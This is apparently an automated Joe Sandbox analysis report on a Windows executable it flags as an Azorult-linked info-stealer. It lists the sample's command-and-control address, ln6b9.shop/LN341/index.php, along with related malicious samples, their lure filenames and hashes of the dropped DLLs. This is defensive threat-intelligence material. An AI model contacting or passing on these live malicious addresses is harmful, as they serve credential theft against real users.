              http://crl.thawte.com/ThawteTimestampingCA.crl0svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, nssdbm3.dll.1.dr, softokn3.dll.1.drfalse
              • URL Reputation: safe
              		unknown
              http://ln6b9.shop/LN341/index.phpAsvchost.exe, 00000001.00000002.1815335312.0000000005200000.00000004.00001000.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              		unknown
              http://ocsp.thawte.com0svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, nssdbm3.dll.1.dr, softokn3.dll.1.drfalse
              • URL Reputation: safe
              		unknown
              http://ip-api.com/jsoncJX8BV8LYG.exe, 00000000.00000002.1707421227.0000000001E50000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1812372698.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://www.mozilla.com0svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, nssdbm3.dll.1.dr, softokn3.dll.1.drfalse
              • URL Reputation: safe
              		unknown
              https://dotbit.me/a/cJX8BV8LYG.exe, 00000000.00000002.1707421227.0000000001E50000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1812372698.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown

              World Map of Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public IPs

              IPDomainCountryFlagASNASN NameMalicious
              172.67.128.117
              		ln6b9.shopUnited States
              		13335CLOUDFLARENETUStrue

              General Information

              Joe Sandbox version:40.0.0 Tourmaline
              Analysis ID:1501450
              Start date and time:2024-08-29 23:41:09 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 4m 44s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:8
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:cJX8BV8LYG.exe
              renamed because original name is a hash value
              Original Sample Name:528D3EF48415F22BD277A9759D83A859.exe
              Detection:MAL
              Classification:mal100.phis.troj.spyw.evad.winEXE@8/53@1/1
              EGA Information:
              • Successful, ratio: 100%
              HCA Information:
              • Successful, ratio: 99%
              • Number of executed functions: 52
              • Number of non-executed functions: 299
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Stop behavior analysis, all processes terminated

              Warnings

              • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
              • Not all processes where analyzed, report is missing behavior information
              • Report size exceeded maximum capacity and may have missing disassembly code.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
              • VT rate limit hit for: cJX8BV8LYG.exe

              Simulations

              Behavior and APIs

              No simulations

              Joe Sandbox View / Context

              IPs

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              172.67.128.117Po#70831.exeGet hashmaliciousAzorultBrowse
              • ln6b9.shop/LN341/index.php

              Domains

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              ln6b9.shop4QihT6CwD8.exeGet hashmaliciousAzorultBrowse
              • 104.21.2.6
              Po#70831.exeGet hashmaliciousAzorultBrowse
              • 172.67.128.117

              ASNs

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              CLOUDFLARENETUSIf doesnt work open it.exeGet hashmaliciousLummaCBrowse
              • 172.67.177.157
              https://uaj.sa/api/aHR0cHM6Ly9nb29nbGUuY29t&sig=ZDUxNjU0ZTllNzZkYTAxNWE4OTNkZTAyM2ZkZDA1MGViMGIzY2UyOTU1MzY1NGMyNjFlOTExM2ZiMzA5MzdmMg&exp=MTcyNDIzOTUzMQGet hashmaliciousHTMLPhisherBrowse
              • 1.1.1.1
              file.exeGet hashmaliciousLummaC, VidarBrowse
              • 188.114.96.3
              NewInst.exeGet hashmaliciousLummaCBrowse
              • 188.114.97.3
              file.exeGet hashmaliciousLummaC, VidarBrowse
              • 188.114.96.3
              file.exeGet hashmaliciousUnknownBrowse
              • 172.64.41.3
              4QihT6CwD8.exeGet hashmaliciousAzorultBrowse
              • 104.21.2.6
              https://5kirp.mellifluous5.com/5kiRp/Get hashmaliciousHTMLPhisherBrowse
              • 172.66.0.227
              https://autode.sk/4g6XSl8&c=E,1,I0OgoTIAL6zcaU4kgbWKwMGE3oDCv6iOL9CcUXdPtaitrRYDaY2yqyg5z3Y_ue3psEsBTb_33PlDmEStP6z69HizNf2ISciGwmDuh9q-ApyQjjb2ectuilD2Rn0,&typo=1Get hashmaliciousUnknownBrowse
              • 104.17.246.203
              file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
              • 188.114.96.3

              JA3 Fingerprints

              No context

              Dropped Files

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-console-l1-1-0.dll4QihT6CwD8.exeGet hashmaliciousAzorultBrowse
                Fordybendes.exeGet hashmaliciousAzorult, GuLoaderBrowse
                  Po#70831.exeGet hashmaliciousAzorultBrowse
                    FedEx Shipping Document.scr.exeGet hashmaliciousAzorultBrowse
                      FedEx Shipping Document.exeGet hashmaliciousAzorultBrowse
                        ACCEPT_014STSY529093.PDF.exeGet hashmaliciousAzorultBrowse
                          Launcher.exeGet hashmaliciousPython Stealer, Stink StealerBrowse
                            SEL1685129 AMANOS.pdf.exeGet hashmaliciousAzorult, GuLoaderBrowse
                              ESPLS-RFQ_2400282.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                ESPLS-RFQ_2400282.exeGet hashmaliciousAzorult, GuLoaderBrowse

                                  Created / dropped Files

                                  C:\Users\user\AppData\Local\Temp\65132962348398743035428.tmp

                                  Download File
                                  Process:C:\Windows\SysWOW64\svchost.exe
                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                  Category:dropped
                                  Size (bytes):40960
                                  Entropy (8bit):0.8553638852307782
                                  Encrypted:false
                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                  Malicious:false
                                  Reputation:high, very likely benign file
                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-console-l1-1-0.dll

                                  Download File
                                  Process:C:\Windows\SysWOW64\svchost.exe
                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):18744
                                  Entropy (8bit):7.080160932980843
                                  Encrypted:false
                                  SSDEEP:192:3jBMWIghWGZiKedXe123Ouo+Uggs/nGfe4pBjS/uBmWh0txKdmVWQ4GWDZoiyqnP:GWPhWVXYi00GftpBjSemTltcwpS
                                  MD5:502263C56F931DF8440D7FD2FA7B7C00
                                  SHA1:523A3D7C3F4491E67FC710575D8E23314DB2C1A2
                                  SHA-256:94A5DF1227818EDBFD0D5091C6A48F86B4117C38550343F780C604EEE1CD6231
                                  SHA-512:633EFAB26CDED9C3A5E144B81CBBD3B6ADF265134C37D88CFD5F49BB18C345B2FC3A08BA4BBC917B6F64013E275239026829BA08962E94115E94204A47B80221
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Joe Sandbox View:
                                  • Filename: 4QihT6CwD8.exe, Detection: malicious, Browse
                                  • Filename: Fordybendes.exe, Detection: malicious, Browse
                                  • Filename: Po#70831.exe, Detection: malicious, Browse
                                  • Filename: FedEx Shipping Document.scr.exe, Detection: malicious, Browse
                                  • Filename: FedEx Shipping Document.exe, Detection: malicious, Browse
                                  • Filename: ACCEPT_014STSY529093.PDF.exe, Detection: malicious, Browse
                                  • Filename: Launcher.exe, Detection: malicious, Browse
                                  • Filename: SEL1685129 AMANOS.pdf.exe, Detection: malicious, Browse
                                  • Filename: ESPLS-RFQ_2400282.exe, Detection: malicious, Browse
                                  • Filename: ESPLS-RFQ_2400282.exe, Detection: malicious, Browse
                                  Reputation:high, very likely benign file
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....."............!......................... ...............................0.......J....@.............................+............ ..................8=..............T............................................................................text...+........................... ..`.rsrc........ ......................@..@......".........;...T...T.........".........d.................".....................RSDSMB...5.G.8.'.d.....api-ms-win-core-console-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg.......+....edata... ..`....rsrc$01....` .......rsrc$02......................".....................(...`...............,...W...................G...o...............................D...s...............5...b...............................................api-ms-win-core-console-l1-1-0.dll.AllocConsole.kern

                                  C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-datetime-l1-1-0.dll

                                  Download File
                                  Process:C:\Windows\SysWOW64\svchost.exe
                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):18232
                                  Entropy (8bit):7.093995452106596
                                  Encrypted:false
                                  SSDEEP:192:RWIghWG4U9xluZo123Ouo+Uggs/nGfe4pBjSbMDPxVWh0txKdmVWQ4CWrDry6qnZ:RWPhWFv0i00GftpBjBHem6plUG+zIw
                                  MD5:CB978304B79EF53962408C611DFB20F5
                                  SHA1:ECA42F7754FB0017E86D50D507674981F80BC0B9
                                  SHA-256:90FAE0E7C3644A6754833C42B0AC39B6F23859F9A7CF4B6C8624820F59B9DAD3
                                  SHA-512:369798CD3F37FBAE311B6299DA67D19707D8F770CF46A8D12D5A6C1F25F85FC959AC5B5926BC68112FA9EB62B402E8B495B9E44F44F8949D7D648EA7C572CF8C
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Reputation:high, very likely benign file
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...A..............!......................... ...............................0.......#....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@....A...........<...T...T.......A...........d...............A.......................RSDS...W,X.l..o....4....api-ms-win-core-datetime-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02....................A.......P...............(...8...H...................t.......................api-ms-win-core-datetime-l1-1-0.dll.GetDateFormatA.kernel32.GetDateFormatA.GetDateFormatW.kernel32.GetDateFormatW.GetTimeFormatA.kernel32.GetTimeFormatA

                                  C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-debug-l1-1-0.dll

                                  Download File
                                  Process:C:\Windows\SysWOW64\svchost.exe
                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):18232
                                  Entropy (8bit):7.1028816880814265
                                  Encrypted:false
                                  SSDEEP:384:cWPhWM4Ri00GftpBj2YILemtclD16PaEC:l10oiBQe/L
                                  MD5:88FF191FD8648099592ED28EE6C442A5
                                  SHA1:6A4F818B53606A5602C609EC343974C2103BC9CC
                                  SHA-256:C310CC91464C9431AB0902A561AF947FA5C973925FF70482D3DE017ED3F73B7D
                                  SHA-512:942AE86550D4A4886DAC909898621DAB18512C20F3D694A8AD444220AEAD76FA88C481DF39F93C7074DBBC31C3B4DAF97099CFED86C2A0AAA4B63190A4B307FD
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Reputation:high, very likely benign file
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!......................... ...............................0......GF....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@................9...T...T...................d.......................................RSDS.j..v..C...B..h....api-ms-win-core-debug-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02............................P...............(...8...H...|...............q.......................api-ms-win-core-debug-l1-1-0.dll.DebugBreak.kernel32.DebugBreak.IsDebuggerPresent.kernel32.IsDebuggerPresent.OutputDebugStringA.kernel32.OutputDebugStri

                                  C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-errorhandling-l1-1-0.dll

                                  Download File
                                  Process:C:\Windows\SysWOW64\svchost.exe
                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):18232
                                  Entropy (8bit):7.126358371711227
                                  Encrypted:false
                                  SSDEEP:192:NFmxD3PWIghWGJY/luZo123Ouo+Uggs/nGfe4pBjSffcp8Wh0txKdmVWQ4yWRzOr:NFkWPhW60i00GftpBj4emHlD16Pa7v
                                  MD5:6D778E83F74A4C7FE4C077DC279F6867
                                  SHA1:F5D9CF848F79A57F690DA9841C209B4837C2E6C3
                                  SHA-256:A97DCCA76CDB12E985DFF71040815F28508C655AB2B073512E386DD63F4DA325
                                  SHA-512:02EF01583A265532D3970B7D520728AA9B68F2B7C309EE66BD2B38BAF473EF662C9D7A223ACF2DA722587429DA6E4FBC0496253BA5C41E214BEA240CE824E8A2
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...\x.............!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@....\x..........A...T...T.......\x..........d...............\x......................RSDS.1....U45.z.d.....api-ms-win-core-errorhandling-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02............\x......n...............(...D...`...................4...f.......................'...J.....................api-ms-win-core-errorhandling-l1-1-0.dll.GetErrorMode.kernel32.GetErrorMode.GetLastError.kernel32.GetLastError.RaiseExcept

                                  C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-file-l1-1-0.dll

                                  Download File
                                  Process:C:\Windows\SysWOW64\svchost.exe
                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):21816
                                  Entropy (8bit):7.014255619395433
                                  Encrypted:false
                                  SSDEEP:384:d6PvVXHWPhWnsnhi00GftpBjaJemyDlD16PamW8:UPvVX85nhoisJeLt8
                                  MD5:94AE25C7A5497CA0BE6882A00644CA64
                                  SHA1:F7AC28BBC47E46485025A51EEB6C304B70CEE215
                                  SHA-256:7EA06B7050F9EA2BCC12AF34374BDF1173646D4E5EBF66AD690B37F4DF5F3D4E
                                  SHA-512:83E570B79111706742D0684FC16207AE87A78FA7FFEF58B40AA50A6B9A2C2F77FE023AF732EF577FB7CD2666E33FFAF0E427F41CA04075D83E0F6A52A177C2B0
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.................!.........................0...............................@......./....@..........................................0..................8=..............T............................................................................text............................... ..`.rsrc........0......................@..@...............8...T...T..................d......................................RSDS.0...B..8....G....api-ms-win-core-file-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02.......................K...K.......D...p...6...`.......................?...l...............A...................6..._...................;...e............... ...I...n...............-...d...................*...g...............*...U...................M...

                                  C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-file-l1-2-0.dll

                                  Download File
                                  Process:C:\Windows\SysWOW64\svchost.exe
                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):18232
                                  Entropy (8bit):7.112057846012794
                                  Encrypted:false
                                  SSDEEP:192:IWIghWGJnWdsNtL/123Ouo+Uggs/nGfe4pBjSfcD63QXWh0txKdmVWQ4yW1rwqnh:IWPhWlsnhi00GftpBjnem9lD16PamFP
                                  MD5:E2F648AE40D234A3892E1455B4DBBE05
                                  SHA1:D9D750E828B629CFB7B402A3442947545D8D781B
                                  SHA-256:C8C499B012D0D63B7AFC8B4CA42D6D996B2FCF2E8B5F94CACFBEC9E6F33E8A03
                                  SHA-512:18D4E7A804813D9376427E12DAA444167129277E5FF30502A0FA29A96884BF902B43A5F0E6841EA1582981971843A4F7F928F8AECAC693904AB20CA40EE4E954
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...._.L...........!......................... ...............................0............@.............................L............ ..................8=..............T............................................................................text...<........................... ..`.rsrc........ ......................@..@....._.L........8...T...T........_.L........d................_.L....................RSDS........g"Y........api-ms-win-core-file-l1-2-0.pdb.........T....rdata..T........rdata$zzzdbg.......L....edata... ..`....rsrc$01....` .......rsrc$02........._.L....@...................(...8...l...............`.......................api-ms-win-core-file-l1-2-0.dll.CreateFile2.kernel32.CreateFile2.GetTempPathW.kernel32.GetTempPathW.GetVolumeNameForVolumeMountPointW.kernel32.GetVolumeNameForVolumeMou

                                  C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-file-l2-1-0.dll

                                  Download File
                                  Process:C:\Windows\SysWOW64\svchost.exe
                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):18232
                                  Entropy (8bit):7.166618249693435
                                  Encrypted:false
                                  SSDEEP:192:BZwWIghWG4U9ydsNtL/123Ouo+Uggs/nGfe4pBjSbUGHvNWh0txKdmVWQ4CWVU9h:UWPhWFBsnhi00GftpBjKvxemPlP55QQ7
                                  MD5:E479444BDD4AE4577FD32314A68F5D28
                                  SHA1:77EDF9509A252E886D4DA388BF9C9294D95498EB
                                  SHA-256:C85DC081B1964B77D289AAC43CC64746E7B141D036F248A731601EB98F827719
                                  SHA-512:2AFAB302FE0F7476A4254714575D77B584CD2DC5330B9B25B852CD71267CDA365D280F9AA8D544D4687DC388A2614A51C0418864C41AD389E1E847D81C3AB744
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...4..|...........!......................... ...............................0......t.....@.......................................... ..................8=..............T............................................................................text...}........................... ..`.rsrc........ ......................@..@....4..|........8...T...T.......4..|........d...............4..|....................RSDS.=.Co.P..Gd./%P....api-ms-win-core-file-l2-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02........4..|........................D...p...............#...P...................;...g...................<...m...............%...Z.........................api-ms-win-core-file-l2-1-0.dll.CopyFile2.kernel32.CopyFile2.CopyFileExW.kernel32.CopyFileExW.Crea

                                  C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-handle-l1-1-0.dll

                                  Download File
                                  Process:C:\Windows\SysWOW64\svchost.exe
                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):18232
                                  Entropy (8bit):7.1117101479630005
                                  Encrypted:false
                                  SSDEEP:384:AWPhWXDz6i00GftpBj5FrFaemx+lDbNh/6:hroidkeppp
                                  MD5:6DB54065B33861967B491DD1C8FD8595
                                  SHA1:ED0938BBC0E2A863859AAD64606B8FC4C69B810A
                                  SHA-256:945CC64EE04B1964C1F9FCDC3124DD83973D332F5CFB696CDF128CA5C4CBD0E5
                                  SHA-512:AA6F0BCB760D449A3A82AED67CA0F7FB747CBB82E627210F377AF74E0B43A45BA660E9E3FE1AD4CBD2B46B1127108EC4A96C5CF9DE1BDEC36E993D0657A615B6
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....G...........!......................... ...............................0......V.....@............................._............ ..................8=..............T............................................................................text..._........................... ..`.rsrc........ ......................@..@......G........:...T...T.........G........d.................G....................RSDSQ..{...IS].0.> ....api-ms-win-core-handle-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg......._....edata... ..`....rsrc$01....` .......rsrc$02......................G....Z...............(...<...P...................A...|...............,.............api-ms-win-core-handle-l1-1-0.dll.CloseHandle.kernel32.CloseHandle.CompareObjectHandles.kernel32.CompareObjectHandles.DuplicateHandle.kernel32

                                  C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-heap-l1-1-0.dll

                                  Download File
                                  Process:C:\Windows\SysWOW64\svchost.exe
                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):18232
                                  Entropy (8bit):7.174986589968396
                                  Encrypted:false
                                  SSDEEP:192:GElqWIghWGZi5edXe123Ouo+Uggs/nGfe4pBjS/PHyRWh0txKdmVWQ4GWC2w4Dj3:GElqWPhWCXYi00GftpBjP9emYXlDbNs
                                  MD5:2EA3901D7B50BF6071EC8732371B821C
                                  SHA1:E7BE926F0F7D842271F7EDC7A4989544F4477DA7
                                  SHA-256:44F6DF4280C8ECC9C6E609B1A4BFEE041332D337D84679CFE0D6678CE8F2998A
                                  SHA-512:6BFFAC8E157A913C5660CD2FABD503C09B47D25F9C220DCE8615255C9524E4896EDF76FE2C2CC8BDEF58D9E736F5514A53C8E33D8325476C5F605C2421F15C7D
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....:............!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@......:.........8...T...T.........:.........d.................:.....................RSDS.K....OB;....X......api-ms-win-core-heap-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02..........:.........................X...............2...Q...q.......................C...h...........................(...E...f.......................0..._...z...............................................api-ms-win-core-heap-l1-1-0.dll.GetProcessHeap.k

                                  C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-interlocked-l1-1-0.dll

                                  Download File
                                  Process:C:\Windows\SysWOW64\svchost.exe
                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):17856
                                  Entropy (8bit):7.076803035880586
                                  Encrypted:false
                                  SSDEEP:192:DtiYsFWWIghWGQtu7B123Ouo+Uggs/nGfe4pBjSPiZadcbWh0txKdmVWQ4mWf2FN:5iYsFWWPhWUTi00GftpBjremUBNlgC
                                  MD5:D97A1CB141C6806F0101A5ED2673A63D
                                  SHA1:D31A84C1499A9128A8F0EFEA4230FCFA6C9579BE
                                  SHA-256:DECCD75FC3FC2BB31338B6FE26DEFFBD7914C6CD6A907E76FD4931B7D141718C
                                  SHA-512:0E3202041DEF9D2278416B7826C61621DCED6DEE8269507CE5783C193771F6B26D47FEB0700BBE937D8AFF9F7489890B5263D63203B5BA99E0B4099A5699C620
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....$.............!......................... ...............................0...........@.......................................... ...................9..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....$..........?...T...T........$..........d................$......................RSDS#.......,.S.6.~j....api-ms-win-core-interlocked-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.................$......................(...T...............L...............!...U...................1.......p...............@...s.................................api-ms-win-core-interlocked-l1-1-0.dll.InitializeSListHead.kernel32.InitializeSLis

                                  C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-libraryloader-l1-1-0.dll

                                  Download File
                                  Process:C:\Windows\SysWOW64\svchost.exe
                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):18744
                                  Entropy (8bit):7.131154779640255
                                  Encrypted:false
                                  SSDEEP:384:yHvuBL3BmWPhWZTi00GftpBjNKnemenyAlvN9W/L:yWBL3BXYoinKne1yd
                                  MD5:D0873E21721D04E20B6FFB038ACCF2F1
                                  SHA1:9E39E505D80D67B347B19A349A1532746C1F7F88
                                  SHA-256:BB25CCF8694D1FCFCE85A7159DCF6985FDB54728D29B021CB3D14242F65909CE
                                  SHA-512:4B7F2AD9EAD6489E1EA0704CF5F1B1579BAF1061B193D54CC6201FFDDA890A8C8FACB23091DFD851DD70D7922E0C7E95416F623C48EC25137DDD66E32DF9A637
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....u*l...........!......................... ...............................0......9.....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....u*l........A...T...T........u*l........d................u*l....................RSDSU..e.j.(.wD.......api-ms-win-core-libraryloader-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.............u*l....................(...p...........R...}...............*...Y...................8..._.......................B...k...................F...u...............)...P...w...................................................api-ms-win-c

                                  C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-localization-l1-2-0.dll

                                  Download File
                                  Process:C:\Windows\SysWOW64\svchost.exe
                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):20792
                                  Entropy (8bit):7.089032314841867
                                  Encrypted:false
                                  SSDEEP:384:KOMw3zdp3bwjGjue9/0jCRrndbVWPhWIDz6i00GftpBj6cemjlD16Pa+4r:KOMwBprwjGjue9/0jCRrndbCOoireqv
                                  MD5:EFF11130BFE0D9C90C0026BF2FB219AE
                                  SHA1:CF4C89A6E46090D3D8FEEB9EB697AEA8A26E4088
                                  SHA-256:03AD57C24FF2CF895B5F533F0ECBD10266FD8634C6B9053CC9CB33B814AD5D97
                                  SHA-512:8133FB9F6B92F498413DB3140A80D6624A705F80D9C7AE627DFD48ADEB8C5305A61351BF27BBF02B4D3961F9943E26C55C2A66976251BB61EF1537BC8C212ADD
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...S.v............!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@....S.v.........@...T...T.......S.v.........d...............S.v.....................RSDS..pS...Z4Yr.E@......api-ms-win-core-localization-l1-2-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02................S.v.....v.......;...;...(.......................<...f.......................5...]...................!...I...q...................N.............../...j.............../...^.................../...\...................8...`...........

                                  C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-memory-l1-1-0.dll

                                  Download File
                                  Process:C:\Windows\SysWOW64\svchost.exe
                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):18744
                                  Entropy (8bit):7.101895292899441
                                  Encrypted:false
                                  SSDEEP:384:+bZWPhWUsnhi00GftpBjwBemQlD16Par7:b4nhoi6BedH
                                  MD5:D500D9E24F33933956DF0E26F087FD91
                                  SHA1:6C537678AB6CFD6F3EA0DC0F5ABEFD1C4924F0C0
                                  SHA-256:BB33A9E906A5863043753C44F6F8165AFE4D5EDB7E55EFA4C7E6E1ED90778ECA
